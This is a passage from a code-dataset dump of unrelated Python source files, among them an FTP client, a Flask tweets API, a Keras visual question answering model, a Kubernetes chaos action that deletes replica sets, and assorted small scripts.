account_m.hexdigest()\n            # print(passwd_md5)\n            acc_msg = {\n                'username': account_name,\n                'password': passwd_md5,\n                'action': 'authenticate'\n            }\n            # print(acc_msg)\n            # send the login information to the server for confirmation\n            self.client.send(json.dumps(acc_msg).encode())\n            # receive the authentication result returned by the server\n            acc_response = self.client.recv(1024).strip()\n            recv_msg = json.loads(acc_response.decode())\n            if recv_msg['status'] == 'ok':\n                print('login succeeded')\n                self.authentication = True\n                self.work_path = recv_msg['work_dir']\n                self.interactive()\n            else:\n                print(recv_msg['status'])\n                continue\n\n    def cmd_put(self, *args):\n        # upload a file; the path must be a full path, e.g. G:\\test\\test.txt\n        cmd_split = args[0].split()\n        if len(cmd_split) > 1:\n            file_path = cmd_split[1]\n            path_list = file_path.split(os.sep)\n            # check whether the directory exists\n            dir_path = os.sep.join(path_list[:-1])\n            if os.path.exists(dir_path):\n                filename = path_list[-1]\n                if os.path.isfile(file_path):\n                    file_size = os.stat(file_path).st_size\n                    # send the file name, size etc. to the server up front as JSON so it can run its own checks\n                    msg_dict = {\n                        'filename': filename,\n                        'size': file_size,\n                        'work_dir': self.work_path,\n                        'overridden': False,\n                        'action': 'put'\n                    }\n                    self.client.send(json.dumps(msg_dict).encode())\n                    # wait for the server to confirm, to avoid sticky packets\n                    server_response = self.client.recv(1024).strip()\n                    # print(server_response.decode())\n                    # a reply of 200 means there is enough space, 500 means there is not\n                    if server_response.decode() == '200':\n                        # progress bar marker\n                        bar = '>'\n                        send_size = 0\n\n                        f = open(file_path, 'rb')\n                        for line in f:\n                            self.client.send(line)\n\n                            # upload progress bar\n                            send_size += len(line)\n                            percent = int(float(send_size) / float(file_size) * 100)\n                            # print(percent)\n                            sys.stdout.write('\\r' + '[' 
+ bar * percent +\n                                             ' ' * (100 - percent) + ']' + str(percent) + '%')\n                            sys.stdout.flush()\n                            if percent == 100:\n                                sys.stdout.write('\\n')\n\n                        f.close()\n\n                        print('file uploaded successfully')\n\n                    else:\n                        print('error code {}: space not enough'.format(server_response.decode()))\n                else:\n                    print(filename, 'does not exist')\n            else:\n                print('the directory does not exist')\n        else:\n            print('please input the filename.')\n\n    def cmd_get(self, *args):\n        # download a file\n        cmd_list = args[0].split()\n        if len(cmd_list) > 1:\n            filename = cmd_list[1]\n            get_msg = {\n                'filename': filename,\n                'work_dir': self.work_path,\n                'action': 'get'\n            }\n            # send the file info to the server\n            self.client.send(json.dumps(get_msg).encode())\n            # receive the response from the server\n            get_response = self.client.recv(1024)\n            info_dict = json.loads(get_response.decode())\n            if info_dict['status'] == '200':\n                file_size = info_dict['file_size']\n                # choose where to store the file\n                storage_dir = input('enter the directory to save the file:')\n                while os.path.exists(storage_dir) is not True:\n                    print('that folder does not exist, please try again')\n                    storage_dir = input('enter the directory to save the file:')\n                else:\n                    # progress bar\n                    bar = '>'\n                    # receive the file; resume the transfer if a partial file already exists\n                    file_path = os.sep.join([storage_dir, filename])\n                    if os.path.isfile(file_path + '.temp'):\n                        received_size = os.stat(file_path + '.temp').st_size\n                    else:\n                        received_size = 0\n                    # reply to the server, to avoid sticky packets on the server side\n                    response_msg = {\n                        'seek_location': received_size,\n                        'status': '200'\n                    }\n                    self.client.send(json.dumps(response_msg).encode())\n                    try:\n                        f = open(file_path + '.temp', 'wb')\n                        f.seek(received_size)\n                        while received_size < file_size:\n                            if file_size - received_size > 1024:\n                                r_data = self.client.recv(1024)\n                            else:\n                                r_data = self.client.recv(file_size - received_size)\n                            received_size += len(r_data)\n                            f.write(r_data)\n                            f.flush()\n                            percent = int(float(received_size) / float(file_size) * 100)\n                            # print(percent)\n                            sys.stdout.write('\\r' + '[' + bar * percent +\n                                             ' ' * (100 - percent) + ']' + str(percent) + '%')\n                            sys.stdout.flush()\n                            if percent == 100:\n                                sys.stdout.write('\\n')\n                        else:\n                            f.close()\n                            # rename the file ending in .temp\n                            os.rename(file_path + '.temp', file_path)\n\n                    except KeyboardInterrupt as e:\n                        print(e)\n\n            else:\n                print('error code {}: the file does not exist'.format(info_dict['status']))\n        else:\n            print('please input the filename.')\n\n    def cmd_ls(self, *args):\n        # list the contents of the current directory\n        cmd_msg = {\n            'word_path': self.work_path,\n            'action': 'ls'\n        }\n        self.client.send(json.dumps(cmd_msg).encode('utf-8'))\n        # receive the response from the server\n        ls_response = self.client.recv(1024)\n        recv_dict = json.loads(ls_response.decode())\n        if recv_dict['status'] == '200':\n            # print the files and folders in the directory\n            for i in recv_dict['dir_info']:\n                print(i)\n        else:\n            print('error code {}:{}'.format(recv_dict['status'], recv_dict['dir_info']))\n\n    def cmd_cd(self, *args):\n        # change the working directory\n        # remember the current directory; if the change fails, stay where we are\n        original_path = self.work_path\n        # print(original_path)\n        cmd_split = args[0].split()\n        if len(cmd_split) > 1:\n            dir_name = cmd_split[1]\n            # make sure the target path stays inside the user's home directory\n            dir_list = dir_name.split('/')\n            # the cd '.' case\n            dot_num = dir_list.count('.')\n            # the cd '..' case\n            double_dot_num = dir_list.count('..')\n            # the named-directory case\n            dirs_list = dir_list[dot_num + double_dot_num:]\n\n            if dir_list == ['.']:\n                workspace = self.work_path\n            elif double_dot_num > 0:\n                workspace = os.sep.join(self.work_path.split(os.sep)[:-double_dot_num])\n                if len(workspace.split(os.sep)) < 4:\n                    print('403, changing outside the home directory is forbidden')\n                else:\n                    workspace = os.sep.join(self.work_path.split(os.sep)[:-double_dot_num] + dirs_list)\n            else:\n                work_path_list = self.work_path.split(os.sep)\n                new_path_list = work_path_list + dirs_list\n                workspace = os.sep.join(new_path_list)\n            cd_msg = {\n                'workspace': workspace,  # the target directory path\n                'action': 'cd'\n            }\n            
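# ask the server to validate the requested directory change\n            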
self.client.send(json.dumps(cd_msg).encode())\n            # result of the server-side check\n            cd_response = self.client.recv(1024)\n\n            if cd_response.decode() == '200':\n                self.work_path = workspace\n            elif cd_response.decode() == '403':\n                self.work_path = original_path\n                # print('error code {}: can not change directory out of ftp home'.format(cd_response.decode()))\n            else:\n                print('error code {}: the directory does not exist'.format(cd_response.decode()))\n\n        else:\n            print('please input the directory.')\n\n    def cmd_pwd(self, *args):\n        # show the current path\n        print(self.work_path)\n\n    def cmd_mkdir(self, *args):\n        # create folders; supports recursive creation like aaa/bbb\n        cmd_list = args[0].split()\n        if len(cmd_list) > 1:\n            dirs = cmd_list[1].split('/')\n            work_path_list = self.work_path.split(os.sep)\n            dir_path_list = work_path_list + dirs\n            dir_path = os.sep.join(dir_path_list)\n            # send it to the server\n            make_msg = {\n                'dir_path': dir_path,\n                'action': 'mkdir'\n            }\n            self.client.send(json.dumps(make_msg).encode())\n            recv_data = self.client.recv(1024)\n            if recv_data.decode() == '200':\n                print('makedir succeeded.')\n            else:\n                print('makedir failed')\n        else:\n            print('please input the directory name')\n\n\ndef run():\n    ftp_client = FtpClient()\n    ftp_client.connect('localhost', 9999)\n    ftp_client.authenticate()\n","sub_path":"Selectors_Ftp/my_ftp_client/core/ftp_client.py","file_name":"ftp_client.py","file_ext":"py","file_size_in_byte":11901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"14136441","text":"import os\nimport re\nimport logging\nimport argparse\nimport itertools\n\n\nclass FileCheckerAction(argparse.Action):\n    @staticmethod\n    def _check_map(file_name: str):\n        with open(file_name, \"r\") as f:\n            fdata = list(\n                filter(None, [re.match(\"[0-9 ]+\", r) for r in f.read().split(\"\\n\")])\n            )\n        try:\n            size = int(fdata[0].group())\n        except ValueError:\n            raise ValueError(f\"Puzzle size too low\")\n        p = sorted(\n            map(\n                int,\n                list(\n                    itertools.chain(\n                        *[list(filter(None, x.group().split(\" \"))) for x in fdata[1:]]\n                    )\n                ),\n            )\n        )\n        if p != list(range(size ** 2)):\n            raise ValueError(f\"Bad number in Puzzle provided\")\n        logging.info(\"File is valid\")\n\n    def __init__(self, option_strings, dest, nargs=None, **kwargs):\n        if nargs is not None:\n            raise ValueError(\"nargs not allowed\")\n        super().__init__(option_strings, dest, **kwargs)\n\n    def __call__(self, parser, namespace, values, option_string=None):\n        if not os.path.exists(values) or os.path.splitext(values)[1] != \".txt\":\n            raise ValueError(\n                f\"File '{values}' does not exist or is in the wrong format (TXT)\"\n            )\n        self._check_map(values)\n        setattr(namespace, self.dest, values)\n","sub_path":"srcs/args/FileCheckerAction.py","file_name":"FileCheckerAction.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
{"seq_id":"428741740","text":"import networkx as nx\nimport matplotlib.pyplot as plt\nfrom sys import stdin\nfrom ctypes import cdll\nfrom ctypes import c_char_p\nfrom ctypes import c_uint\nfrom ctypes import c_double\nlib = cdll.LoadLibrary ('lib/libgraf.so')\n\n\ndef prepareGraph (obj, action):\n\tobj = lib.newGraphDrawerAM(graph)\n\tg = nx.Graph()\n\tfor i in range(lib.GetNodes(obj)):\n\t\tg.add_node(i)\n\t\tfor j in range(lib.Nbors(obj,i)):\n\t\t\tg.add_edge(i,lib.GetVal(obj,i,j))\n\tpos = nx.shell_layout(g)\n\tnx.draw_networkx_nodes(g,pos,node_size=300)\n\tnx.draw_networkx_edges(g,pos)\n\tnx.draw_networkx_labels(g,pos)\n\t#plt.title(\"Graph Title\")\n\tplt.axis('off') \n\tif action == 
\"d\":\n\t\tplt.show()\n\telse:\n\t\tplt.savefig(action)\n\t \ndef draw(obj):\n\tprepareGraph(obj, \"d\")\n\ndef save(graph):\n\tname = \"save/\" + raw_input(\"File name: \")\n\tlib.save(graph, c_char_p(name))\n\tprepareGraph(graph, name+\".png\")\n\ndef show(graph):\n\tlib.show(graph)\n\ndef menu():\n\tprint(\"New graph: n\")\n\tprint(\"Show graphs: g\")\n\tprint(\"Exit: q\\n\")\n\treturn raw_input(\">>> \")\t\n\n'''\nstatus = menu()\ngraphs = []\nwhile(status != \"q\"):\n\tif status == \"n\":\n\t\tgraphs.append(lib.newGraphAM(c_uint(5),c_uint(4)))\n\telif status == \"g\":\n\t\tfor i in graphs:\n\t\t\tshow(i)\n\t\t\tprint(\"\")\n\tstatus = menu()'''\n\t\ngraph = lib.newEdgeGraphAM(c_uint(5),c_uint(4))\nprint(\"GraphAM:\")\nshow(graph)\n#TEST:\n'''graph = lib.AM_to_IM(graph)\nprint(\"AM_to_IM:\")\nshow(graph)\ngraph = lib.IM_to_AM(graph)\nprint(\"IM_to_AM:\")\nshow(graph)\ngraph = lib.AM_to_AL(graph)\nprint(\"AM_to_AL:\")\nshow(graph)\ngraph = lib.AL_to_IM(graph)\nprint(\"AL_to_IM:\")\nshow(graph)\ngraph = lib.IM_to_AL(graph)\nprint(\"IM_to_AL:\")\nshow(graph)\ngraph = lib.AL_to_AM(graph)\nprint(\"AL_to_AM:\")\nshow(graph)'''\n\nsave(graph)\n\ndraw(graph)\ngraph = lib.newGraphDrawer(graph)\t\n\nb = raw_input(\"Narysowac graf?(y/n)\")\nif b==\"y\":\n\tdraw(graph)\n\n\n","sub_path":"graphs.py","file_name":"graphs.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"590362885","text":"#!/usr/bin/env python3\n# __@@__ Coding:utf-8\n\n\"\"\"\n@version: ??\n@author: luxutao\n@licence: Apache Licence\n@contact: xutao.lu.cn@gmail.com\n@site: http://www.123m.me\n@filename: workerManager.py\n@projectname: PycharmProjects\n@time: 2016-8-27 下午12:57\n\"\"\"\n\nimport time,random,queue\nfrom multiprocessing.managers import BaseManager\n\nBaseManager.register('get_task_queue')\nBaseManager.register('result_task_queue')\n\nserver_ip = '127.0.0.1'\nport = 5000\nprint('Connect to server %s ' % server_ip)\n\nm = BaseManager(address=(server_ip,port),authkey=b'abc')\n\nm.connect()\ntask = m.get_task_queue()\nresult = m.result_task_queue()\n\nfor i in range(10):\n try:\n n = task.get(timeout=1)\n print('run task %d * %d' % (n,n))\n r = '%d * %d = %d' % (n,n,n * n)\n time.sleep(1)\n result.put(r)\n except queue.Empty:\n print('task queue is empty')\nprint('worker exit')","sub_path":"process_and_thead/workerManager.py","file_name":"workerManager.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"183006844","text":"import json\n\nfrom flask import Flask, request\nfrom pymongo import MongoClient\nfrom bson import json_util\n\n\napp = Flask(__name__)\n\n\nclient = MongoClient('localhost', 27017)\ndb = client['twitter_db']\ncollection = db['twitter_collection']\n\n\ndef to_json(data):\n return json.dumps(data, default=json_util.default)\n\n\n@app.route('/tweets', methods=['GET'])\ndef tweets():\n if request.method == 'GET':\n results = collection.find()\n json_results = []\n for result in results:\n json_results.append(result)\n return to_json(json_results)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"flaskapi.py","file_name":"flaskapi.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"39947543","text":"import requests\n\nmoney=int(input(\"enter Dollars: 
\"))\n\nurl=\"https://currencyapi.net/api/v1/rates?key=AZcoollxIoPSPU9G5GeS6rsOtf9odRYRATKw\"\n\nrespnse=requests.get(url)\ndata=respnse.json()\n\nprint(\"$\",money,\"=\",\"Rs\",money*data[\"rates\"][\"INR\"])\n\n\n","sub_path":"doubts-7/usd_to_inr.py","file_name":"usd_to_inr.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"306108534","text":"import pandas as pd\nimport re\nimport jieba.analyse\nfrom wordcloud import WordCloud\nfrom matplotlib import pyplot as plt\n\n\"\"\"\n 创建词云\n\"\"\"\n\ndef data_clean(path):\n \"\"\"\n 获取数据,进行数据处理\n :param path: 数据路径\n :return: 返回清洗后的数据-- 好友签名\n \"\"\"\n names = [\"nickname\", \"name\", \"gender\", \"province\", \"city\", \"signature\", \"attrStatus\"]\n data = pd.read_csv(path, header=None, names=names)\n # print(data.head())\n\n signature = data[\"signature\"] # 获取所有签名的数据\n signature = signature.dropna() # 删除空签名\n\n word = \"\"\n for i in signature:\n # i = '随遇而安️' # 测试替换成功\n if \"<\" or \">\" in i:\n i = re.sub(r\"<.*?>\", \"\", i)\n i = \" \".join(jieba.analyse.extract_tags(i, 5)) # 基于TF-IDF 算法的关键词抽取\n word += i\n\n return word\n\ndef creat_wordcloud(word):\n \"\"\"\n 创建词云图\n :param word: 需要生产词云的文本\n :return: None\n \"\"\"\n # 读取图片背景\n background = plt.imread(\"1.png\")\n\n # 设置词云样式\n word_style = WordCloud(font_path=\"/usr/share/fonts/truetype/arphic/ukai.ttc\", # 设置字体\n background_color=\"lightpink\", # 设置背景颜色\n max_words=200, # 设置显示词云的数量\n mask=background) # 背景图\n\n # 将词汇导入\n word_style.generate(word)\n\n # 存储词云图\n word_style.to_file(\"2.png\")\n\n\nif __name__ == '__main__':\n path = \"friends.csv\"\n # 1.数据处理\n word = data_clean(path)\n # 2.词云生产\n creat_wordcloud(word)\n","sub_path":"Project/wechat/wechat_word.py","file_name":"wechat_word.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"637133842","text":"# This is a sample Python script.\r\n\r\n# Press Shift+F10 to execute it or replace it with your code.\r\n# Press Double Shift to search everywhere for classes, files, tool windows, actions, and settings.\r\n\r\n\r\ndef print_hi(name):\r\n # Use a breakpoint in the code line below to debug your script.\r\n print(f'Hi, {name}') # Press Ctrl+F8 to toggle the breakpoint.\r\n ans= count_iter(\"My name is Saurabh what's your\",\"a\")\r\n print(ans)\r\n\r\ndef count_iter(string,char):\r\n if not string:\r\n ans =0\r\n elif char == string[0]:\r\n ans = 1 + count_iter(string[1:], char)\r\n else:\r\n ans = count_iter(string[1:], char)\r\n return ans\r\n\r\n\r\n\r\n\r\n# Press the green button in the gutter to run the script.\r\nif __name__ == '__main__':\r\n print_hi('PyCharm')\r\n\r\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\r\n","sub_path":"pythonProject/recursion1.py","file_name":"recursion1.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"214246620","text":"import pygame\nimport pymunk\nimport math\nfrom pymunk import Vec2d\n\n# Screen size\nwidth, height = 1200,600\n\n# Table dimensions\nscaling = 7\ntable_width = int(160*scaling) #Playable area\ntable_height = int(70*scaling) #Playable area\npuck_radius = int(7/2*scaling)\npusher_radius = int(9.6/2*scaling)\ngoal_size = 30*scaling\n\n# wall varaibles\nwall_thickness = 10\n\n# Outer values\nleft = (width-table_width-2*wall_thickness)/2\nright = width-left\ntop = 
(height-table_height-2*wall_thickness)/2\nbottom = height-top\n\n# Puck center reachable positions\npuck_topPos = top + wall_thickness + puck_radius\npuck_bottomPos = bottom - wall_thickness - puck_radius\n\n# Pusher center reachable positions\npusher_distFromWall = 10 #The closest the pusher can get to the wall\npuck_leftPos = left + wall_thickness + pusher_distFromWall + pusher_radius #maybe add: + puck_radius\n\nimport joblib\nfrom pathlib import Path\npath = Path(__file__).parent\n\nmodel = joblib.load(path/'model.joblib')\ndef rotate_vel(velocity):\n angle_inn = velocity.angle\n angle_out = model.predict([[abs(angle_inn)]])[0][0]\n\n rotated_velocity = velocity\n if angle_inn < 0:\n rotated_velocity = velocity.rotated(-angle_inn+angle_out)\n\n if angle_inn > 0:\n rotated_velocity = velocity.rotated(-angle_inn-angle_out)\n\n return rotated_velocity\n\ndef path_points(puck_velocity,puck_pos):\n\n P = puck_pos\n last_velocity = puck_velocity\n totalTime = 0\n t = 0\n points = []\n calculate = False\n while puck_velocity[0] < 0 and puck_pos[0] > puck_leftPos:\n points.append(puck_pos)\n totalTime += t\n if puck_velocity[0] < 0 and puck_velocity[1] < 0:\n t = (puck_topPos - puck_pos[1])/puck_velocity[1]\n Px = puck_pos[0] + puck_velocity[0]*t\n\n\n puck_pos = [Px,puck_topPos]\n last_velocity = puck_velocity\n puck_velocity = rotate_vel(puck_velocity)\n calculate = True\n\n elif puck_velocity[0] <= 0 and puck_velocity[1] > 0:\n t = (puck_bottomPos - puck_pos[1])/puck_velocity[1]\n Px = puck_pos[0] + puck_velocity[0]*t\n\n puck_pos = [Px,puck_bottomPos]\n last_velocity = puck_velocity\n puck_velocity = rotate_vel(puck_velocity)\n calculate = True\n\n\n if calculate:\n t = (puck_leftPos-points[-1][0])/last_velocity[0]\n totalTime += t\n\n Py = points[-1][1]+last_velocity[1]*t\n \n puck_pos = [puck_leftPos,Py]\n points.append(puck_pos)\n \n else:\n points.append(puck_pos)\n\n \n #print(points)\n return points","sub_path":"Simulator/Testing/Bot/Puck_path/puck_path2.py","file_name":"puck_path2.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} {"seq_id":"492706158","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 08 19:06:33 2018\n\nauthor: Akshita Gupta\n\"\"\"\nfrom get_data import get_metadata, prepare_embeddings, get_train_data, get_test_data\nfrom my_models import san_atten\nimport numpy as np\n\nroot_path = 'E:/akshita_workspace/cc/Audio-Vision/VQA/Stacked Attention/data/'\nval_file = root_path + 'mscoco_val2014_annotations.json'\ninput_json = root_path + 'vqa_data_prepro.json' # Vocab and answers \ninput_img_train_h5 = root_path + 'img_train_2.h5' #Images train features\ninput_img_test_h5 = root_path + 'img_test_2.h5' #Images test features\ninput_ques_h5 = root_path + 'vqa_data_prepro.h5' #Question features\n\n\ncommon_word_emb_dim = 512\nword_emb_dim = 300\nembedding_matrix_filename = root_path + 'embeddings_%s.h5'%word_emb_dim\nglove_path = root_path + 'glove.6B.300d.txt'\nimg_norm = 1\nnb_classes = 1000\noptimizer = 'sgd'\nbatch_size = 20\nepochs = 4\nactivation_1 = 'tanh'\nactivation_2 = 'tanh'\ndropout = 0.5\nvocabulary_size = 15107\nnum_hidden_units_lstm = 512\nmax_ques_length = 26\nnum_hidden_layers_mlp = 3\nnum_hidden_units_mlp = 512\nclass_activation = 'sigmoid'\nimg_vec_dim = 4096\nfilter_sizes = [128,256,256]\nnum_attention_layers = 1\n\n\nmetadata=get_metadata(input_json)\n\n#embedding_matrix = prepare_embeddings(vocabulary_size, word_emb_dim, metadata, 
embedding_matrix_filename, glove_path)\n#print(embedding_matrix.shape)\nmodel= san_atten(common_word_emb_dim,img_vec_dim, activation_1,activation_2, dropout, vocabulary_size,\n num_hidden_units_lstm, max_ques_length,\n word_emb_dim, num_hidden_layers_mlp,\n num_hidden_units_mlp, nb_classes, class_activation,filter_sizes,num_attention_layers)\nmodel.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\nmodel.summary() # prints model layers with weights\n\ntrain_X, train_Y= get_train_data(input_img_train_h5, input_ques_h5)\n\ntest_X,test_Y, multi_val_y=get_test_data(input_img_test_h5, input_ques_h5,metadata,val_file)\n\nmodel.fit(train_X, train_Y, batch_size = batch_size, epochs=epochs, validation_data=(test_X, test_Y),verbose=1)\n\nprint (\"Evaluating Accuracy on validation set:\")\nmetric_vals = model.evaluate(test_X, test_Y)\nprint (\"\")\nfor metric_name, metric_val in zip(model.metrics_names, metric_vals):\n print (metric_name, \" is \", metric_val)\n\n# Comparing prediction against multiple choice answers\ntrue_positive = 0\npreds = model.predict(test_X)\npred_classes = [np.argmax(_) for _ in preds]\nfor i, _ in enumerate(pred_classes):\n if _ in multi_val_y[i]:\n true_positive += 1\nprint (\"true positive rate: \", np.float(true_positive)/len(pred_classes))\n","sub_path":"VQA/Stacked Attention/mainfile.py","file_name":"mainfile.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"221672763","text":"from chaoslib.types import Secrets\nfrom kubernetes import client\nfrom logzero import logger\n\nfrom chaosk8s import create_k8s_api_client\n\n__all__ = [\"delete_replica_set\"]\n\n\ndef delete_replica_set(name: str, ns: str = \"default\",\n label_selector: str = \"name in ({name})\",\n secrets: Secrets = None):\n \"\"\"\n Delete a replica set by `name` in the namespace `ns`.\n\n The replica set is deleted without a graceful period to trigger an abrupt\n termination.\n\n The selected resources are matched by the given `label_selector`.\n \"\"\"\n label_selector = label_selector.format(name=name)\n api = create_k8s_api_client(secrets)\n v1 = client.ExtensionsV1beta1Api(api)\n if label_selector:\n ret = v1.list_namespaced_replica_set(ns, label_selector=label_selector)\n else:\n ret = v1.list_namespaced_replica_set(ns)\n\n logger.debug(\"Found {d} replica sets named '{n}'\".format(\n d=len(ret.items), n=name))\n\n body = client.V1DeleteOptions()\n for r in ret.items:\n v1.delete_namespaced_replica_set(r.metadata.name, ns, body=body)\n","sub_path":"chaosk8s/replicaset/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"566811442","text":"import pandas as pd\nimport os\n\"\"\"\ntrain-annotations-bbox.csv will be downloaded if you go through point Dataset Used Under Implementation of this project\nin readme File\n\"\"\"\n# Reference for this code can be taken from https://github.com/WyattAutomation/Train-YOLOv3-with-OpenImagesV4\nf=pd.read_csv(\"/yolo_model/darknet_tuned/OIDv4_ToolKit/OID/csv_folder/train-annotations-bbox.csv\")\n\"\"\"\nThere is another files downloaded (if you go through point Dataset Used Under Implementation of this project) called\nas class-descriptions-boxable.csv. 
From this file the code for pizza is/m/0663v\n\"\"\"\nnumClasses = ['/m/0663v']\nu = f.loc[f['LabelName'].isin(numClasses)]\nkeep_col = ['LabelName','ImageID','XMin','XMax','YMin','YMax']\nnew_f = u[keep_col]\nnew_f['ClassNumber'] = new_f['LabelName']\nnew_f.loc[new_f['LabelName'] == '/m/0663v', 'ClassNumber'] = 1\nnew_f['width'] = new_f['XMax'] - new_f['XMin']\nnew_f['height'] = new_f['YMax'] - new_f['YMin']\nnew_f['x'] = (new_f['XMax'] + new_f['XMin'])/2\nnew_f['y'] = (new_f['YMax'] + new_f['YMin'])/2\nkeep_col = ['ClassNumber','ImageID','x','y','width','height']\nnew_f_2 = new_f[keep_col]\n\nfor root, dirs, files in os.walk(\".\"):\n\tfor filename in files:\n\t\tif filename.endswith(\".jpg\"):\n\t\t\tfn = filename[:-4]\n\t\t\tnf = new_f_2.loc[new_f_2['ImageID'] == fn]\n\t\t\tkeep_col = ['ClassNumber','x','y','width','height']\n\t\t\tnew_nf = nf[keep_col]\n\t\t\tprint(new_nf)\n \t\t# saving the txt file containing all the labels for pizza images\n\t\t\timgpath = \"/yolo_model/darknet_tuned/OIDv4_ToolKit/OID/Dataset/train/Pizza_labels/\" + fn + \".txt\"\n\t\t\tprint(imgpath)\n\t\t\tnew_nf.to_csv(imgpath, index=False, header=False, sep=' ')\n","sub_path":"pizza.py","file_name":"pizza.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"290318128","text":"# The MIT License (MIT)\n# Copyright (c) 2019 by the xcube development team and contributors\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy of\n# this software and associated documentation files (the \"Software\"), to deal in\n# the Software without restriction, including without limitation the rights to\n# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies\n# of the Software, and to permit persons to whom the Software is furnished to do\n# so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport os\nimport os.path\nfrom abc import abstractmethod, ABCMeta\nfrom typing import Optional, Sequence, Dict, Any, Union\nimport fiona as fio\nimport psycopg2\nimport geopandas as gpd\nimport json\n\n\nFeature = Dict[str, Any]\nSchema = Dict[str, Any]\nBBox = Sequence\n\n\nclass GeoDBService(metaclass=ABCMeta):\n\n @abstractmethod\n def find_feature(self, collection_name: str, query: str, fmt: str = 'geojson', bbox: BBox = None,\n bbox_mode: str = 'contains', bbox_crs: int = 4326) -> Optional[Feature]:\n \"\"\"\n\n :param fmt: format of return type\n :param bbox_crs: The CRS (SRID) of the bbox. It has to match the SRID of the targeted collection\n :param bbox_mode: Can be 'contains' or 'within'. 
Refer to https://postgis.net/docs/ST_Within.html and\n https://postgis.net/docs/ST_Contains.html\n :param bbox: bbox as array [minx, miny, maxx, maxy]\n :param collection_name: Name of the collection\n :param query: a query to filter features from all collections\n \"\"\"\n\n @abstractmethod\n def find_features(self, collection_name: str, query: str = None, max_records: int = -1, fmt: str = 'geopandas',\n bbox: BBox = None, bbox_mode: str = 'contains', bbox_crs: int = 4326) -> \\\n Union[Sequence[Feature], gpd.GeoDataFrame]:\n \"\"\"\n\n :param bbox_crs: The CRS (SRID) of the bbox. It has to match the SRID of the targeted collection\n :param bbox_mode: Can be 'contains' or 'within'. Refer to https://postgis.net/docs/ST_Within.html\n and https://postgis.net/docs/ST_Contains.html\n :param bbox: bbox as array [minx, miny, maxx, maxy]\n :param collection_name: Name of the collection\n :param fmt: format of return type\n :param query: a query to filter features from all collections\n :param max_records: maximum number of records to be returned\n \"\"\"\n\n @abstractmethod\n def new_collection(self, collection_name: str, schema: Schema):\n \"\"\"\n\n :param collection_name: a name for the new collection\n :param schema: a feature schema\n \"\"\"\n\n @abstractmethod\n def drop_collection(self, collection_name: str):\n \"\"\"\n\n :param collection_name: the name of the collection to drop\n \"\"\"\n\n @abstractmethod\n def add_feature(self, collection_name: str, feature: Feature) -> str:\n \"\"\"\n\n :param collection_name: the name of the collection the feature will be added to\n :param feature: a feature to be added\n \"\"\"\n\n @abstractmethod\n def add_features(self, collection_name: str, features: Sequence[Feature]) -> str:\n \"\"\"\n\n :param collection_name: the name of the collection the features will be added to\n :param features: a list of features to be added\n \"\"\"\n pass\n\n\nclass LocalGeoDBService(GeoDBService):\n\n def __init__(self):\n super().__init__()\n\n def find_feature(self, collection_name: str, query: str, fmt: str = 'geojson', bbox: BBox = None,\n bbox_mode: str = 'contains', bbox_crs: int = 4326) -> Optional[Feature]:\n\n features = self.find_features(collection_name, query, bbox=bbox, bbox_crs=bbox_crs, fmt=fmt,\n bbox_mode=bbox_mode, max_records=1)\n return features[0] if features else None\n\n def find_features(self, collection_name: str, query: str = None, max_records: int = -1, fmt: str = 'geopandas',\n bbox: BBox = None, bbox_mode: str = 'contains', bbox_crs: int = 4326) -> \\\n Union[Sequence[Feature], gpd.GeoDataFrame]:\n\n if bbox:\n raise NotImplementedError(\"bbox feature not implemented for driver local\")\n\n compiled_query = compile(query, 'query', 'eval')\n result_set = []\n\n collection = self._get_collection(collection_name)\n for feature in collection:\n # noinspection PyBroadException\n try:\n _locals = dict(id=feature.get('id')) if feature.get('id') else {}\n _locals.update(feature.get('properties', {}))\n result = eval(compiled_query, None, _locals)\n except Exception:\n result = False\n if result:\n result_set.append(feature)\n if len(result_set) >= max_records:\n break\n return result_set\n\n def new_collection(self, collection_name: str, schema: Schema):\n raise 